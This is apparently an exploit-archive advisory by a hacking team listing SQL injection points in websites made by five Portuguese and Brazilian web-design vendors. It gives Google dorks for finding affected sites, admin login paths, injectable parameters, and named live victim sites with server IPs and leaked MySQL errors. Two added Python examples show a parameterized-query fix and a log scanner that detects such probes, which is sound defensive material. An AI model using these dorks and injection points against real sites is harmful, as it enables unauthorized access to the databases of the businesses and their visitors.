######################################################################################
# Exploit Title : C3iM * HiperwebBrasil * HumbertoCaldas * Vale Mais Comunicação * Webproj Web Designs SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepages :
c3im.pt - hiperwebbrasil.com.br - humbertocaldas.com - valemais.net - webproj.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
*****************************************************************************
There are 5 vendors whose products suffer from remote SQL Injection vulnerabilities.
Table of Contents :
1) Desenvolvido C3iM Portugal Web Design SQL Injection Vulnerability => [ Vendor ] => c3im.pt
2) HiperwebBrasil Web Design SQL Injection Vulnerability => [ Vendor ] => hiperwebbrasil.com.br
3) HumbertoCaldas Web Design SQL Injection Vulnerability => [ Vendor ] => humbertocaldas.com
4) Vale Mais Comunicação Web Design SQL Injection Vulnerability => [ Vendor ] => valemais.net
5) Webproj Brazil Web Design SQL Injection Vulnerability => [ Vendor ] => webproj.com.br
*****************************************************************************
# Google Dorks :
intext:''Desenvolvido C3iM'' site:pt
intext:''Hiperweb Brasil'' site:br
intext:''Site by Humberto Caldas''
intext:''Desenvolvido por Vale Mais Comunicação''
intext:''Desenvolvido por Webproj'' site:br
***********************************************************************************
######################################################################################
# Exploit Title : Desenvolvido C3iM Portugal SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : c3im.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido C3iM'' site:pt
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin
# SQL Injection Exploit :
***********************
/associados_id.php?id=[SQL Injection]
/conteudo.php?id=[SQL Injection]
/new.php?id=[SQL Injection]
/content.php?id=[SQL Injection]
/event.php?id=[SQL Injection]
/noticia.php?id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] danotec.pt/conteudo.php?id=1%27 =>
[ Proof of Concept ] => archive.is/BcJYk
Note : (192.185.106.107) => There are 104 domains hosted on this server.
Note : (192.185.86.89) => There are 174 domains hosted on this server.
######################################################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near '\'' at line 1
********************************************************************
######################################################################################
# Exploit Title : HiperwebBrasil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : hiperwebbrasil.com.br - twitter.com/Hiperweb
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Hiperweb Brasil'' site:br
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin/
# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]
/conc_encontre.php?id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] sincodiv-rj.com.br/noticias.php?id=67%27 =>
[ Proof of Concept ] => archive.is/DqTlc
Note => (177.70.106.69) => There are 186 domains hosted on this server.
######################################################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near ''67''' at line 1
*******************************************************************
######################################################################################
# Exploit Title : HumbertoCaldas SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : humbertocaldas.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Site by Humberto Caldas''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin
# SQL Injection Exploit :
***********************
/noticia.php?id=[SQL Injection]
/galeria_id.php?id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] indoorpadelcenter.pt/noticia.php?id=14%27 =>
[ Proof of Concept ] => archive.is/xSKcq
######################################################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for
the right syntax to use near '\'' at line 1
**********************************************************************
######################################################################################
# Exploit Title : Vale Mais Comunicação SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : valemais.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Vale Mais Comunicação''
intext:''© 2008-2013 | www.valemais.net''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin/
# SQL Injection Exploit :
***********************
/projeto.php?id=[SQL Injection]
/noticias.php?id=[SQL Injection]
/produto.php?cat=[SQL Injection]
/produto.php?cat=[ID-NUMBER]&gr=&id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] clam.ind.br/projeto.php?id=2%27 =>
[ Proof of Concept ] => archive.is/niemC
Note : (187.17.111.100) => There are 8,650 domains hosted on this server.
######################################################################################
# SQL Database Error :
**********************
Fatal error: Uncaught exception 'Exception' with message 'MySQL:
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''2'' ORDER BY
codigo ASC' at line 1' in /var/www/html/clam.ind.br/web/beam/system
/Connection.class.php:110 Stack trace: #0 /var/www/html/clam.ind.br/web
/beam/system/Connection.class.php(83): Connection->throwSqlError() #1
/var/www/html/clam.ind.br/web/beam/system/Beam.class.php(134):
Connection->query('SELECT * FROM s...') #2 /var/www/html/clam.ind.br
/web/beam/system/Beam.class.php(131): Beam->fetchSelect('SELECT *
FROM s...') #3 /var/www/html/clam.ind.br/web/beam/system/Beam.class.php
(181): Beam->buscar('SELECT * FROM s...') #4 /var/www/html/clam.ind.br
/web/beam/system/Beam.class.php(128): Beam->buscarTabela('', -1, 1, 'ASC',
'codigo = '2''') #5 /var/www/html/clam.ind.br/web/beam/system/Beam.class.php
(150): Beam->buscar('codigo = '2''') #6 /var/www/html/clam.ind.br/web
/projeto.php(8): Beam->buscarChave('2'') #7 {main} thro in /var/www
/html/clam.ind.br/web/beam/system/Connection.class.php on line 110
*********************************************************************
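The stack trace above shows the root cause: the request parameter is spliced into the query text as `codigo = '2''`, and the raw MySQL error is echoed to the visitor. The following is an added example, not code from the advisory or from any of the vendors: it reproduces that concatenation pattern against an in-memory SQLite table and places the parameterized, input-validated version beside it. The `projetos` table and `titulo` column are constructed for the demo; only the `codigo` column name comes from the trace.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Build a small constructed 'projetos' table so the demo runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE projetos (codigo INTEGER PRIMARY KEY, titulo TEXT)")
    conn.executemany("INSERT INTO projetos VALUES (?, ?)",
                     [(1, "Projeto A"), (2, "Projeto B"), (3, "Projeto C")])
    return conn

def buscar_vulneravel(conn: sqlite3.Connection, id_param: str):
    """Vulnerable pattern: the request parameter is spliced into the SQL text.
    id_param "2'" yields ... WHERE codigo = '2'' ORDER BY codigo ASC, the
    unbalanced quote that the MySQL error in the advisory complains about."""
    sql = f"SELECT * FROM projetos WHERE codigo = '{id_param}' ORDER BY codigo ASC"
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # A site that echoes exc to the browser hands the visitor a confirmation
        # of the bug; log it server-side and return a generic error instead.
        return ("db_error", str(exc))

def buscar_seguro(conn: sqlite3.Connection, id_param: str):
    """Hardened: reject anything that is not a plain positive integer, then bind
    the value as a parameter so it can never change the query structure."""
    if not id_param.isdigit():
        return ("bad_request", "id must be a positive integer")
    sql = "SELECT * FROM projetos WHERE codigo = ? ORDER BY codigo ASC"
    return ("ok", conn.execute(sql, (int(id_param),)).fetchall())

if __name__ == "__main__":
    db = make_db()
    print(buscar_vulneravel(db, "2'"))  # db_error: unterminated quoted string
    print(buscar_seguro(db, "2'"))      # bad_request: no SQL is executed
    print(buscar_seguro(db, "2"))       # ok: [(2, 'Projeto B')]
```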
######################################################################################
# Exploit Title : Webproj Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : webproj.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Webproj'' site:br
intext:''Criação de sites Porto Alegre''
intext:''Criação de loja virtual Porto Alegre''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin
# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] corpoacao.com.br/noticias.php?id=61%27 =>
[ Proof of Concept ] => archive.is/Ym4qv
Note : (191.252.132.249) => There are 18 domains hosted on this server.
Note : (35.211.91.136) => There are 6 domains hosted on this server.
######################################################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near ''61''' at line 1
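Every probe in this advisory has the same shape: a `.php` page whose `id` (or `cat`) parameter normally carries an integer receives a value with a trailing `%27`. The following is an added detection example, not part of the advisory: it scans web-server access-log lines and flags any request to a `.php` endpoint where one of those parameters is not a bare integer. The log lines are constructed for the demo and modelled on the probe URLs above; the list of numeric parameter names is an assumption drawn from those URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)
# Parameters the advisory shows carrying integer ids (assumed set).
NUMERIC_PARAMS = {"id", "cat"}

def suspicious_params(uri: str) -> dict:
    """Return {param: decoded_value} for id/cat values that are not plain integers."""
    parts = urlsplit(uri)
    if not parts.path.endswith(".php"):
        return {}
    hits = {}
    # parse_qs percent-decodes, so id=1%27 arrives here as "1'".
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in NUMERIC_PARAMS:
            continue
        for value in values:
            if not value.isdigit():
                hits[name] = value
    return hits

def scan(lines):
    """Return (ip, status, path, hits) for each request worth alerting on."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or truncated line: skip rather than crash
        hits = suspicious_params(m["uri"])
        if hits:
            findings.append((m["ip"], int(m["status"]), urlsplit(m["uri"]).path, hits))
    return findings

# Constructed sample log: a normal view, an error-based probe answered with
# HTTP 200 (the leaked MySQL error is still a "successful" page), a probe on
# a multi-parameter endpoint answered with 500, and unrelated static traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jan/2019:10:00:01 +0000] "GET /conteudo.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [18/Jan/2019:10:00:03 +0000] "GET /conteudo.php?id=1%27 HTTP/1.1" 200 412',
    '203.0.113.9 - - [18/Jan/2019:10:00:07 +0000] "GET /produto.php?cat=3&gr=&id=2%27 HTTP/1.1" 500 0',
    '198.51.100.2 - - [18/Jan/2019:10:00:09 +0000] "GET /css/site.css HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Status codes alone are not a reliable signal here: the second probe returns 200 because the page renders the database error as ordinary content, so the check keys on the parameter value rather than on the response.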
######################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
######################################################################################